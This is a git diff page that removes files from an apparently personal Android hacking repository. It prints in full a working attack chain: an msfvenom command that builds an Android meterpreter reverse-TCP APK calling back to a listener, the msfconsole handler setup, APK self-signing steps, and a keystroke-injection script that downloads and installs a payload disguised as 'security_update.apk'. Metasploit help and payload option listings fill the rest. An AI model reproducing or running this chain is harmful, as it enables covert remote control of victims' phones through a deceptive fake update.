Compare commits
1 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 4c0f846ffb |
@@ -1,121 +0,0 @@
|
|||||||
Creative Commons Legal Code
|
|
||||||
|
|
||||||
CC0 1.0 Universal
|
|
||||||
|
|
||||||
CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
|
|
||||||
LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
|
|
||||||
ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
|
|
||||||
INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
|
|
||||||
REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
|
|
||||||
PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
|
|
||||||
THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
|
|
||||||
HEREUNDER.
|
|
||||||
|
|
||||||
Statement of Purpose
|
|
||||||
|
|
||||||
The laws of most jurisdictions throughout the world automatically confer
|
|
||||||
exclusive Copyright and Related Rights (defined below) upon the creator
|
|
||||||
and subsequent owner(s) (each and all, an "owner") of an original work of
|
|
||||||
authorship and/or a database (each, a "Work").
|
|
||||||
|
|
||||||
Certain owners wish to permanently relinquish those rights to a Work for
|
|
||||||
the purpose of contributing to a commons of creative, cultural and
|
|
||||||
scientific works ("Commons") that the public can reliably and without fear
|
|
||||||
of later claims of infringement build upon, modify, incorporate in other
|
|
||||||
works, reuse and redistribute as freely as possible in any form whatsoever
|
|
||||||
and for any purposes, including without limitation commercial purposes.
|
|
||||||
These owners may contribute to the Commons to promote the ideal of a free
|
|
||||||
culture and the further production of creative, cultural and scientific
|
|
||||||
works, or to gain reputation or greater distribution for their Work in
|
|
||||||
part through the use and efforts of others.
|
|
||||||
|
|
||||||
For these and/or other purposes and motivations, and without any
|
|
||||||
expectation of additional consideration or compensation, the person
|
|
||||||
associating CC0 with a Work (the "Affirmer"), to the extent that he or she
|
|
||||||
is an owner of Copyright and Related Rights in the Work, voluntarily
|
|
||||||
elects to apply CC0 to the Work and publicly distribute the Work under its
|
|
||||||
terms, with knowledge of his or her Copyright and Related Rights in the
|
|
||||||
Work and the meaning and intended legal effect of CC0 on those rights.
|
|
||||||
|
|
||||||
1. Copyright and Related Rights. A Work made available under CC0 may be
|
|
||||||
protected by copyright and related or neighboring rights ("Copyright and
|
|
||||||
Related Rights"). Copyright and Related Rights include, but are not
|
|
||||||
limited to, the following:
|
|
||||||
|
|
||||||
i. the right to reproduce, adapt, distribute, perform, display,
|
|
||||||
communicate, and translate a Work;
|
|
||||||
ii. moral rights retained by the original author(s) and/or performer(s);
|
|
||||||
iii. publicity and privacy rights pertaining to a person's image or
|
|
||||||
likeness depicted in a Work;
|
|
||||||
iv. rights protecting against unfair competition in regards to a Work,
|
|
||||||
subject to the limitations in paragraph 4(a), below;
|
|
||||||
v. rights protecting the extraction, dissemination, use and reuse of data
|
|
||||||
in a Work;
|
|
||||||
vi. database rights (such as those arising under Directive 96/9/EC of the
|
|
||||||
European Parliament and of the Council of 11 March 1996 on the legal
|
|
||||||
protection of databases, and under any national implementation
|
|
||||||
thereof, including any amended or successor version of such
|
|
||||||
directive); and
|
|
||||||
vii. other similar, equivalent or corresponding rights throughout the
|
|
||||||
world based on applicable law or treaty, and any national
|
|
||||||
implementations thereof.
|
|
||||||
|
|
||||||
2. Waiver. To the greatest extent permitted by, but not in contravention
|
|
||||||
of, applicable law, Affirmer hereby overtly, fully, permanently,
|
|
||||||
irrevocably and unconditionally waives, abandons, and surrenders all of
|
|
||||||
Affirmer's Copyright and Related Rights and associated claims and causes
|
|
||||||
of action, whether now known or unknown (including existing as well as
|
|
||||||
future claims and causes of action), in the Work (i) in all territories
|
|
||||||
worldwide, (ii) for the maximum duration provided by applicable law or
|
|
||||||
treaty (including future time extensions), (iii) in any current or future
|
|
||||||
medium and for any number of copies, and (iv) for any purpose whatsoever,
|
|
||||||
including without limitation commercial, advertising or promotional
|
|
||||||
purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
|
|
||||||
member of the public at large and to the detriment of Affirmer's heirs and
|
|
||||||
successors, fully intending that such Waiver shall not be subject to
|
|
||||||
revocation, rescission, cancellation, termination, or any other legal or
|
|
||||||
equitable action to disrupt the quiet enjoyment of the Work by the public
|
|
||||||
as contemplated by Affirmer's express Statement of Purpose.
|
|
||||||
|
|
||||||
3. Public License Fallback. Should any part of the Waiver for any reason
|
|
||||||
be judged legally invalid or ineffective under applicable law, then the
|
|
||||||
Waiver shall be preserved to the maximum extent permitted taking into
|
|
||||||
account Affirmer's express Statement of Purpose. In addition, to the
|
|
||||||
extent the Waiver is so judged Affirmer hereby grants to each affected
|
|
||||||
person a royalty-free, non transferable, non sublicensable, non exclusive,
|
|
||||||
irrevocable and unconditional license to exercise Affirmer's Copyright and
|
|
||||||
Related Rights in the Work (i) in all territories worldwide, (ii) for the
|
|
||||||
maximum duration provided by applicable law or treaty (including future
|
|
||||||
time extensions), (iii) in any current or future medium and for any number
|
|
||||||
of copies, and (iv) for any purpose whatsoever, including without
|
|
||||||
limitation commercial, advertising or promotional purposes (the
|
|
||||||
"License"). The License shall be deemed effective as of the date CC0 was
|
|
||||||
applied by Affirmer to the Work. Should any part of the License for any
|
|
||||||
reason be judged legally invalid or ineffective under applicable law, such
|
|
||||||
partial invalidity or ineffectiveness shall not invalidate the remainder
|
|
||||||
of the License, and in such case Affirmer hereby affirms that he or she
|
|
||||||
will not (i) exercise any of his or her remaining Copyright and Related
|
|
||||||
Rights in the Work or (ii) assert any associated claims and causes of
|
|
||||||
action with respect to the Work, in either case contrary to Affirmer's
|
|
||||||
express Statement of Purpose.
|
|
||||||
|
|
||||||
4. Limitations and Disclaimers.
|
|
||||||
|
|
||||||
a. No trademark or patent rights held by Affirmer are waived, abandoned,
|
|
||||||
surrendered, licensed or otherwise affected by this document.
|
|
||||||
b. Affirmer offers the Work as-is and makes no representations or
|
|
||||||
warranties of any kind concerning the Work, express, implied,
|
|
||||||
statutory or otherwise, including without limitation warranties of
|
|
||||||
title, merchantability, fitness for a particular purpose, non
|
|
||||||
infringement, or the absence of latent or other defects, accuracy, or
|
|
||||||
the present or absence of errors, whether or not discoverable, all to
|
|
||||||
the greatest extent permissible under applicable law.
|
|
||||||
c. Affirmer disclaims responsibility for clearing rights of other persons
|
|
||||||
that may apply to the Work or any use thereof, including without
|
|
||||||
limitation any person's Copyright and Related Rights in the Work.
|
|
||||||
Further, Affirmer disclaims responsibility for obtaining any necessary
|
|
||||||
consents, permissions or other rights required for any use of the
|
|
||||||
Work.
|
|
||||||
d. Affirmer understands and acknowledges that Creative Commons is not a
|
|
||||||
party to this document and has no duty or obligation with respect to
|
|
||||||
this CC0 or use of the Work.
|
|
||||||
@@ -1,13 +0,0 @@
|
|||||||
* [ROBTRT421/apk.android.meterpreter.msfvenom](https://github.com/ROBTRT421/apk.android.meterpreter.msfvenom)
|
|
||||||
* [AzeemIdrisi/PhoneSploit-Pro](https://github.com/AzeemIdrisi/PhoneSploit-Pro)
|
|
||||||
* [apksigner](https://developer.android.com/tools/apksigner)
|
|
||||||
* [App Signing](https://developer.android.com/studio/publish/app-signing#generate-key)
|
|
||||||
* [Android Studio](https://developer.android.com/studio)
|
|
||||||
* [msfvenom docs](https://www.offsec.com/metasploit-unleashed/msfvenom/)
|
|
||||||
* [Meterpreter on Android Blog Post](https://medium.com/@S3Curiosity/exploring-the-power-of-msfvenom-for-android-meterpreter-in-ethical-hacking-8c6b54bc66ad)
|
|
||||||
* [David Bombal's Rubber Ducky Meterpreter Payload](https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter)
|
|
||||||
* [APK Install Rubber Ducky Payload](https://payloadhub.com/blogs/payloads/android-meterpreter-apk-install)
|
|
||||||
* [o.mg cable meterpreter android (youtube)](https://www.youtube.com/watch?v=LRVlaNfthbg)
|
|
||||||
* [o.mg android payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android)
|
|
||||||
* [o.mg android meterpreter payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android/meterpreter)
|
|
||||||
* [Tutorial on android meterpreter](https://samsclass.info/128/proj/M410a.htm)
|
|
||||||
@@ -1,73 +1,2 @@
|
|||||||
# Android Hackfuckin
|
# android-hackhackin
|
||||||
## Meterpreter
|
|
||||||
`msfvenom --payload android/meterpreter_reverse_tcp LHOST=10.0.0.51 LPORT=443 R > rawdoggin_output.apk`
|
|
||||||
|
|
||||||
## Msfconsole
|
|
||||||
```
|
|
||||||
sudo msfconsole -q
|
|
||||||
msf > use exploit/multi/handler
|
|
||||||
msf exploit(handler) > set payload android/meterpreter_reverse_tcp
|
|
||||||
msf exploit(handler) > set lhost 10.0.0.51
|
|
||||||
msf exploit(handler) > set lport 443
|
|
||||||
msf exploit(handler) > exploit -j
|
|
||||||
```
|
|
||||||
|
|
||||||
## Python Shitfuckery
|
|
||||||
`python -m http.server 8787`
|
|
||||||
|
|
||||||
## Self Sign an apk
|
|
||||||
### Install tools
|
|
||||||
1. `sudo apt update`
|
|
||||||
2. `sudo apt install apktool gnupg2 android-tools-adb default-jdk -y`
|
|
||||||
### Create Signing Key
|
|
||||||
* `keytool -genkey -v -keystore android.keystore -alias android -keyalg RSA -keysize 2048 -validity 10000`
|
|
||||||
### Sign Apk
|
|
||||||
* `jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore android.keystore my_app.apk android`
|
|
||||||
|
|
||||||
|
|
||||||
## Some Shit
|
|
||||||
```
|
|
||||||
TAB
|
|
||||||
DELAY 250
|
|
||||||
GUI b
|
|
||||||
DELAY 800
|
|
||||||
CTRL SHIFT n
|
|
||||||
DELAY 500
|
|
||||||
CTRL l
|
|
||||||
DELAY 1000
|
|
||||||
STRING 192.168.4.4:9002/security_update.apk
|
|
||||||
ENTER
|
|
||||||
DELAY 7000
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
DOWN
|
|
||||||
RIGHT
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
ENTER
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
RIGHT
|
|
||||||
ENTER
|
|
||||||
TAB
|
|
||||||
ENTER
|
|
||||||
TAB
|
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
|
||||||
TAB
|
|
||||||
ENTER
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
DELAY 350
|
|
||||||
TAB
|
|
||||||
ENTER
|
|
||||||
DELAY 350
|
|
||||||
ENTER
|
|
||||||
```
|
|
||||||
|
|||||||
-1922
File diff suppressed because it is too large
Load Diff
@@ -1,42 +0,0 @@
|
|||||||
|
|
||||||
Framework Architectures [--arch <value>]
|
|
||||||
========================================
|
|
||||||
|
|
||||||
Name
|
|
||||||
----
|
|
||||||
aarch64
|
|
||||||
armbe
|
|
||||||
armle
|
|
||||||
cbea
|
|
||||||
cbea64
|
|
||||||
cmd
|
|
||||||
dalvik
|
|
||||||
firefox
|
|
||||||
java
|
|
||||||
loongarch64
|
|
||||||
mips
|
|
||||||
mips64
|
|
||||||
mips64le
|
|
||||||
mipsbe
|
|
||||||
mipsle
|
|
||||||
nodejs
|
|
||||||
php
|
|
||||||
ppc
|
|
||||||
ppc64
|
|
||||||
ppc64le
|
|
||||||
ppce500v2
|
|
||||||
python
|
|
||||||
r
|
|
||||||
riscv32be
|
|
||||||
riscv32le
|
|
||||||
riscv64be
|
|
||||||
riscv64le
|
|
||||||
ruby
|
|
||||||
sparc
|
|
||||||
sparc64
|
|
||||||
tty
|
|
||||||
x64
|
|
||||||
x86
|
|
||||||
x86_64
|
|
||||||
zarch
|
|
||||||
|
|
||||||
@@ -1,11 +0,0 @@
|
|||||||
|
|
||||||
Framework Encryption Formats [--encrypt <value>]
|
|
||||||
================================================
|
|
||||||
|
|
||||||
Name
|
|
||||||
----
|
|
||||||
aes256
|
|
||||||
base64
|
|
||||||
rc4
|
|
||||||
xor
|
|
||||||
|
|
||||||
@@ -1,76 +0,0 @@
|
|||||||
|
|
||||||
Framework Executable Formats [--format <value>]
|
|
||||||
===============================================
|
|
||||||
|
|
||||||
Name
|
|
||||||
----
|
|
||||||
asp
|
|
||||||
aspx
|
|
||||||
aspx-exe
|
|
||||||
axis2
|
|
||||||
dll
|
|
||||||
ducky-script-psh
|
|
||||||
elf
|
|
||||||
elf-so
|
|
||||||
exe
|
|
||||||
exe-only
|
|
||||||
exe-service
|
|
||||||
exe-small
|
|
||||||
hta-psh
|
|
||||||
jar
|
|
||||||
jsp
|
|
||||||
loop-vbs
|
|
||||||
macho
|
|
||||||
msi
|
|
||||||
msi-nouac
|
|
||||||
osx-app
|
|
||||||
psh
|
|
||||||
psh-cmd
|
|
||||||
psh-net
|
|
||||||
psh-reflection
|
|
||||||
python-reflection
|
|
||||||
vba
|
|
||||||
vba-exe
|
|
||||||
vba-psh
|
|
||||||
vbs
|
|
||||||
war
|
|
||||||
|
|
||||||
Framework Transform Formats [--format <value>]
|
|
||||||
==============================================
|
|
||||||
|
|
||||||
Name
|
|
||||||
----
|
|
||||||
base32
|
|
||||||
base64
|
|
||||||
bash
|
|
||||||
c
|
|
||||||
csharp
|
|
||||||
dw
|
|
||||||
dword
|
|
||||||
go
|
|
||||||
golang
|
|
||||||
hex
|
|
||||||
java
|
|
||||||
js_be
|
|
||||||
js_le
|
|
||||||
masm
|
|
||||||
nim
|
|
||||||
nimlang
|
|
||||||
num
|
|
||||||
octal
|
|
||||||
perl
|
|
||||||
pl
|
|
||||||
powershell
|
|
||||||
ps1
|
|
||||||
py
|
|
||||||
python
|
|
||||||
raw
|
|
||||||
rb
|
|
||||||
ruby
|
|
||||||
rust
|
|
||||||
rustlang
|
|
||||||
sh
|
|
||||||
vbapplication
|
|
||||||
vbscript
|
|
||||||
zig
|
|
||||||
|
|
||||||
@@ -1,32 +0,0 @@
|
|||||||
MsfVenom - a Metasploit standalone payload generator.
|
|
||||||
Also a replacement for msfpayload and msfencode.
|
|
||||||
Usage: /usr/bin/msfvenom [options] <var=val>
|
|
||||||
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
|
|
||||||
|
|
||||||
Options:
|
|
||||||
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
|
|
||||||
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
|
|
||||||
--list-options List --payload <value>'s standard, advanced and evasion options
|
|
||||||
-f, --format <format> Output format (use --list formats to list)
|
|
||||||
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
|
|
||||||
--service-name <value> The service name to use when generating a service binary
|
|
||||||
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
|
|
||||||
--smallest Generate the smallest possible payload using all available encoders
|
|
||||||
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
|
|
||||||
--encrypt-key <value> A key to be used for --encrypt
|
|
||||||
--encrypt-iv <value> An initialization vector for --encrypt
|
|
||||||
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
|
|
||||||
--platform <platform> The platform for --payload (use --list platforms to list)
|
|
||||||
-o, --out <path> Save the payload to a file
|
|
||||||
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
|
|
||||||
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
|
|
||||||
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
|
|
||||||
-s, --space <length> The maximum size of the resulting payload
|
|
||||||
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
|
|
||||||
-i, --iterations <count> The number of times to encode the payload
|
|
||||||
-c, --add-code <path> Specify an additional win32 shellcode file to include
|
|
||||||
-x, --template <path> Specify a custom executable file to use as a template
|
|
||||||
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
|
|
||||||
-v, --var-name <value> Specify a custom variable name to use for certain output formats
|
|
||||||
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
|
|
||||||
-h, --help Show this message
|
|
||||||
@@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Framework NOPs (13 total)
|
|
||||||
=========================
|
|
||||||
|
|
||||||
Name Description
|
|
||||||
---- -----------
|
|
||||||
aarch64/simple Simple NOP generator
|
|
||||||
armle/simple Simple NOP generator
|
|
||||||
cmd/generic Generates harmless padding for command payloads.
|
|
||||||
mipsbe/better Better NOP generator
|
|
||||||
php/generic Generates harmless padding for PHP scripts
|
|
||||||
ppc/simple Simple NOP generator
|
|
||||||
riscv32le/simple Simple NOP generator
|
|
||||||
riscv64le/simple Simple NOP generator
|
|
||||||
sparc/random SPARC NOP generator
|
|
||||||
tty/generic Generates harmless padding for TTY input
|
|
||||||
x64/simple An x64 single/multi byte NOP instruction generator.
|
|
||||||
x86/opty2 Opty2 multi-byte NOP generator
|
|
||||||
x86/single_byte Single-byte NOP generator
|
|
||||||
|
|
||||||
@@ -1,32 +0,0 @@
|
|||||||
|
|
||||||
Name: AIX Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/aix/ppc/shell_bind_tcp
|
|
||||||
Platform: AIX
|
|
||||||
Arch: ppc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 264
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AIX 6.1.4 yes IBM AIX Version
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,31 +0,0 @@
|
|||||||
|
|
||||||
Name: AIX Command Shell, Find Port Inline
|
|
||||||
Module: payload/aix/ppc/shell_find_port
|
|
||||||
Platform: AIX
|
|
||||||
Arch: ppc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 220
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AIX 6.1.4 yes IBM AIX Version
|
|
||||||
CPORT 64342 no The local client port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a shell on an established connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,30 +0,0 @@
|
|||||||
|
|
||||||
Name: AIX execve Shell for inetd
|
|
||||||
Module: payload/aix/ppc/shell_interact
|
|
||||||
Platform: AIX
|
|
||||||
Arch: ppc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 56
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
jduck <jduck@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AIX 6.1.4 yes IBM AIX Version
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Simply execve /bin/sh (for inetd programs)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,39 +0,0 @@
|
|||||||
|
|
||||||
Name: AIX Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/aix/ppc/shell_reverse_tcp
|
|
||||||
Platform: AIX
|
|
||||||
Arch: ppc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 204
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Ramon de C Valle <rcvalle@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AIX 6.1.4 yes IBM AIX Version
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,74 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter, Android Reverse HTTP Stager
|
|
||||||
Module: payload/android/meterpreter/reverse_http
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: N
|
|
||||||
Evasion options for payload/android/meterpreter/reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
t.com>
|
|
||||||
OJ Reeves
|
|
||||||
anwarelmakrahy
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run a meterpreter server in Android.
|
|
||||||
|
|
||||||
Tunnel communication over HTTP
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
|
||||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
|
||||||
HttpReferer no An optional value to use for the Referer HTTP header
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,76 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter, Android Reverse HTTPS Stager
|
|
||||||
Module: payload/android/meterpreter/reverse_https
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: N
|
|
||||||
Evasion options for payload/android/meterpreter/reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
.com>
|
|
||||||
OJ Reeves
|
|
||||||
anwarelmakrahy
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run a meterpreter server in Android.
|
|
||||||
|
|
||||||
Tunnel communication over HTTPS
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
|
||||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
